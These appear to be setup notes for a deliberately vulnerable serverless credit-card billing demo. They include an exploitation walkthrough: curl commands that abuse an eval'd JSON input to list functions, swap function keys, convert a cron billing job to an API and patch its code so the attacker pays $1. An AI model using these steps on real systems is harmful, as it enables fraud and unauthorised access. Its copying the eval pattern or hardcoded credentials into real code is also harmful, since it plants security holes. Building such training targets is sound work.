Setup notes
After deploying the .js files and package.json file for each function, you'll need to go into the scm console <>, go into the home/site/wwwroot/ directory and run
npm install
. It'll take a long time. -
Sometimes calls to the API just seem to fail. Can't reproduce locally. Not sure, just try again.
I've included all sorts of creds directly in source out of
lazinessexpediency. -
Running the below steps will leave the app in the broken state. I haven't yet written easy scripts to reset things to 'beginning' state:
- Billing needs function.json.bkup copied back over function.json
- TotalView and Billing need their original creds (d:\home\data\Functions\secrets)
- Billing needs its original code (or just the offending line removed)
- ?? (haven't fully tested)
Layout for the vulnerable app.
Maybe delivered with serverless?
- This is a webapp to consolidate credit card payments.
- Payments aggregate over the month, and at the end of the month a scheduled function sends a single bill out, thus avoiding additional credit card fees.
Endpoints / functions:
- Check my balance:
- API endpoint
- In:
- The 'semi-public' key for the function
- Their card number in json format {cardNumber: } which is eval'd
- Returns: dates and amounts of purchases
- This is the vulnerable endpoint
- Check what will be paid at the end of the month:
- API endpoint
- Requires master (or 'more secret') key to use
- Returns dict of card #s to payments processed
- Billing function:
- Cron for once monthly
- Per customer, sums costs and then sends the bill out
- Marks as billed? (allowing spoofing)
- API endpoint for writing charges? (not implemented yet, maybe unneccesary)
- Change code to not accept your credit card?
Exploitation path:
- Discover arbitrary code execution in initial API endpoint:
- Since path is read-only, we're not too worried about breaking things
- exploit is just eval'ing some JSON to make things super simple
- Information gained:
- Master key / secure key (encrypted, haven't dug into how to decrypt)
- List of other functions (we didn't know about the other ones)
- General access
- Dump sources of other functions as wanted
- Take key
- Use to trigger the general 'card info' function
- Modify billing function:
- Change it from cron to API
- Trigger billing at arbitrary times
- Change source of billing function to only bill me $1
- Change source of 'charge writing' API to not accept my card (or someone else's?) (if fn exists)
SQL schema:
- Cards: ID, card#, API key
- Purchases: ID, CardID, Time, $amount
Routes: (plug the relevant keys in for your own? functions app)
vuln_api: takes your credit card #, returns just your charges.
curl -X POST -d @benign.json -K vuln.config
example: [{"amount":24.99,"date":"2017-06-15T00:00:00Z"},{"amount":5.99,"date":"2017-06-17T00:00:00Z"}]
totalView: Doesn't take any arguments. Returns the list of all charges.
curl -X POST -d '{}' -K total.config
example: [{"card_id":1,"amount":24.99,"date":"2017-06-15T00:00:00Z"},{"card_id":1,"amount":5.99,"date":"2017-06-17T00:00:00Z"},{"card_id":2,"amount":8,"date":"2017-06-16T00:00:00Z"},{"card_id":2,"amount":29,"date":"2017-06-18T00:00:00Z"},{"card_id":2,"amount":0.99,"date":"2017-06-18T00:00:00Z"}]
billing: Sums up the cards to do the billing. Can't be triggered via API, is triggered via cron.
Vulns: ===================================
curl -X POST -d @print_return.json -K vuln.config
example: "custom text"
List available functions with secret sets via list_functions:
curl -X POST -d @list_functions.json -K vuln.config
example: ["billing.json","host.json","httptriggerjs2.json","manualtriggerjs1.json","publicvuln.json","timertriggerjs1.json","totalview.json","totalview.json.bkup","totalview.json.orig"]
Try to run totalview:
curl -X POST -d '{}' -K total_noauth.config
example: this doesn't work because we don't have the key!
Change permissions on totalview: (they keys on disk are encrypted, but they're all encrypted against the same key, so we can just copy in our known working one!)
curl -X POST -d @change_totalview_perms.json -K vuln.config
example: "done"
After changing perms, run totalView again:
curl -X POST -d '{}' -K total_noauth.config
example: [{"card_id":1,"amount":24.99,"date":"2017-06-15T00:00:00Z"},{"card_id":1,"amount":5.99,"date":"2017-06-17T00:00:00Z"},{"card_id":2,"amount":8,"date":"2017-06-16T00:00:00Z"},{"card_id":2,"amount":29,"date":"2017-06-18T00:00:00Z"},{"card_id":2,"amount":0.99,"date":"2017-06-18T00:00:00Z"}]
Now what's Billing - let's read its function metadata:
curl -X POST -d @read_billing_info.json -K vuln.config
example: "{\r\n "bindings": [\r\n {\r\n "name": "myTimer",\r\n "type": "timerTrigger",\r\n "direction": "in",\r\n "schedule": "0 0 0 1 * *"\r\n }\r\n ],\r\n "disabled": false\r\n}"
We can't call it by API since it's a cron job. Let's change it to being API-able:
curl -X POST -d @change_billing_to_api.json -K vuln.config
Now change the permissions to use our known key like above:
curl -X POST -d @change_billing_perms.json -K vuln.config
Now we can query it via API:
curl -X POST -d @benign.json -K billing.config
example: [{"1234-5678-9012-3456":30.98},{"0000-0000-0000-0000":37.99}]
But we don't want to be billed, right? Let's see how billing works by dumping the source:
curl -X POST -d @read_billing_source.json -K vuln.config
Now let's put in something for our card:
curl -X POST -d @patch_billing_code.json -K vuln.config
example: "done"
And when we query billing again:
curl -X POST -d @benign.json -K billing.config
example: {"1234-5678-9012-3456":1,"0000-0000-0000-0000":37.99}
- make it cooler by making vuln_api use an sql user that doesn't have creds to just do the further queries by itself (so we have to gain access to totalView)